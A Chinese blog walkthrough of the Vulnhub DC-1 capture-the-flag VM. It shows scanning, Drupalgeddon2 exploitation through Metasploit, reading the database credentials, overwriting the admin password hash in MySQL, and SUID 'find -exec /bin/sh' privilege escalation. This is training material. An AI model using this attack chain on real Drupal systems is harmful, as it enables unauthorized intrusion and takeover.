Vulnhub靶机 DC-1

最新推荐文章于 2024-03-19 22:16:09 发布
最新推荐文章于 2024-03-19 22:16:09 发布
阅读量274 收藏 1
点赞数 2
分类专栏: vulnhub 文章标签: 信息安全 经验分享 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38005854/article/details/104956692
版权

查找靶机IP

在这里插入图片描述
扫描本地,254是Kali,那138就是DC-1

arp-scan -l

对DC-1进行端口扫描

在这里插入图片描述
发现开放80端口,进浏览器查看一下

nmap -sV 192.168.0.138

在这里插入图片描述发现CMD是Drupal

漏洞查找

msfconsole 启动msf
search drupal 查找drupal漏洞在这里插入图片描述
看到最新的是2019-02-20,但是等级是normal,还是用2018-03-28的吧,等级是excellent,比较靠谱,正常应该都试一下,看看哪个可以利用,偷个懒,蒙一下

search drupal

在这里插入图片描述
use 后面接路径,利用漏洞
show options 看看有什么需要配置的,要把显示yes的选项配置好

use exploit/unix/webapp/drupal_drupalgeddon2
show options

在这里插入图片描述
只有一项RHOSTS需要配置
配置方法:set 【要配置选项名】 【内容】
RHOSTS要添加你要攻击的IP
全部配置完毕
运行:run/exploit(都是运行攻击命令)
成功运行,返回shell

set RHOST 192.168.0.138
exploit

在这里插入图片描述
进入shell,然后用python取得一个交互式的shell

shell
python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述无从下手了,查看一下当前文件吧,刚好看见flag1.txt,查看一下,应该是暗示配置文件

ls  查看当前文件夹下的文件名
cat flag1.txt

在这里插入图片描述
在这里插入图片描述
搜了一下,drupal的配置文件路径是:/sites/default/settings.php
进入查看一下
找到了flag2,提示暴力破解不是唯一途径,还给出了mysql数据库的账号,那去登录一下看看有什么信息
username=dbuser
password=R0ck3t

cd sites
ls
cd default
ls
cat settings.php

在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述
发现一个admin账户,密码却是哈希值,flag2提示说不能暴力破解,那就替换掉原账户的密码

`mysql -u dbuser -p
show databases;   查看所有数据库
use drupaldb;  使用数据库
show tables;  展示所有表信息
select * from users;  查看表中所有信息

在这里插入图片描述

生成一下csz的哈希值: S S SDLFhA2kQLT.My2LISZFHdxS.SpCnlCZJimDVXM5dxkngcEBEGoKh
一会用这个哈希值来替换原来admin账户密码的哈希值

./scripts/password-hash.sh csz
update  users set pass="$S$DLFhA2kQLT.My2LISZFHdxS.SpCnlCZJimDVXM5dxkngcEBEGoKh" where name="admin";

在这里插入图片描述
密码更换成功,现在的admin账号的密码就是csz了
用这个刚好登录一下刚才的网站
在这里插入图片描述
登录成功!但是没发现有什么flag,随便看看网站各处吧。
在这里插入图片描述
找到Dashboard里有flag3,查看一下

在这里插入图片描述
提示让我们使用find和-exec命令,以及提示我们特殊的权限权限有助于发现隐藏内容

在这里插入图片描述
隐藏文件的话,看到先想到passwd
果然发现flag4 /bin/bash
结合flag3的提示的话
下一个flag很好找了
使用命令提升权限

在这里插入图片描述

find ./ csz521 -exec '/bin/sh' \;
whoami
cd /root
ls
cat thefinalflag.txt

这样的话,五个flag算是全拿到了,大功告成!

菜浪马废
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
靶机DC-1 WP
m0_66638011的博客
05-11 1181
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 6571
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
DC-1靶机渗透全流程详细
最新发布
qq_63940076的博客
03-19 907
发现了22和80端口,80端口是http协议端口,可以被访问,22端口是ssh远程登录端口,只要知道账号和口令密码就能远程登录。这个时候有两种办法,一是找到密码的加密规则,修改admin或Fred账户的密码,二是再增加一个admin用户。简述就是一些进程拥有root权限,在使用这些进程的时候是root用户的权限,据此用来提升权限。我们有两个方法拿到这个用户的密码,一个是爆破,另一个就是提权打开shadow文件查看密码。然后使用这个命令提权,查找一个存在的文件,后面加上-exec "/bin/sh" \;
看完这篇 教你玩转渗透测试靶机vulnhub——DC1
Aluxian_的博客
03-22 7197
Vulnhub靶机DC1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:漏洞发现: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 Vulnhub靶机下载: 官网地址:https://www.vulnhub.com/entry/dc-1,292/ Vulnhub靶机安装: 下载好了把安装包
Vulnhub靶机DC-1(suid find提权)
过期的秋刀鱼
08-03 386
Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。22、根据 flag4.txt 中的内容,推测下一步需要进行提权,从而获得 root 权限,并访问 /root 目录,获得 flag5。找到了与 http 相关的模块,根据 Rank(等级)优先选择带颜色的模块,使用。
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4363
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
DC-1靶机渗透
weixin_45349299的博客
01-03 279
title: DC-1靶机渗透详解tags: DC系列靶机categories: 学习笔记。
dc-1靶机
qq_63267612的博客
09-28 1219
显示修改成功,尝试去登陆发现登陆失败,这里显示的密码是加密过的,尝试去找到drupaldb的加密方式,然后把密码更改为一个加密过的但是是已知的密码。可以看到开放了ssh端口和http和111端口,尝试查看一下网站,有一个登陆框,尝试sql注入,发现没有用,不过可以从界面发现cms是drupal。使用说明:下载后解压后得到一个ova的文件,在vm虚拟机中直接打开设置好相关的设置,配置好之后,注意靶机和kali的网络设置调换成NAT模式。知道了cms是drupaldrupal有一些可以利用的漏洞进入msf。
DC-1靶机渗透复现(详细教程)
hqhhhh的博客
10-09 171
DC-1靶机渗透实战教学,非常详细!包学包会
dc-1靶机实战详情(新手)
kyp_1994的博客
08-28 1066
dc-1靶机详细获取flag过程新手勿喷
DC-1靶机学习
qq_43711254的博客
11-09 855
DC靶机的练习过程,如有错误请各位大佬及时指出
靶机DC-1攻略
weixin_43179779的博客
10-07 1100
dc-1靶机靶机攻略
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解
qq_58091216的博客
09-25 450
13. 我们切换语句进入shell,执行whoami查看当前权限,执行ls查看当前目录下文件,切换到root目录,查看文件,发现cat thefinalflag.txt文件。15. 此时我们查看 /etc/passwd 文件,发现存在 flag4 用户,我们也可以使用 hydra 进行爆破。2) 查看数据库,切换到drupaldb数据库,查看查找默认的Drupal user 表,发现admin信息。5. 虚拟机开启之后需要登录,我们不知道密码,需要探活ip地址,网段知道:192.168.52.0/24。
玩转靶机VulnhubDC1(详细)
weixin_51566481的博客
07-26 756
新手靶机dc1,msfconsole,suid提权
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值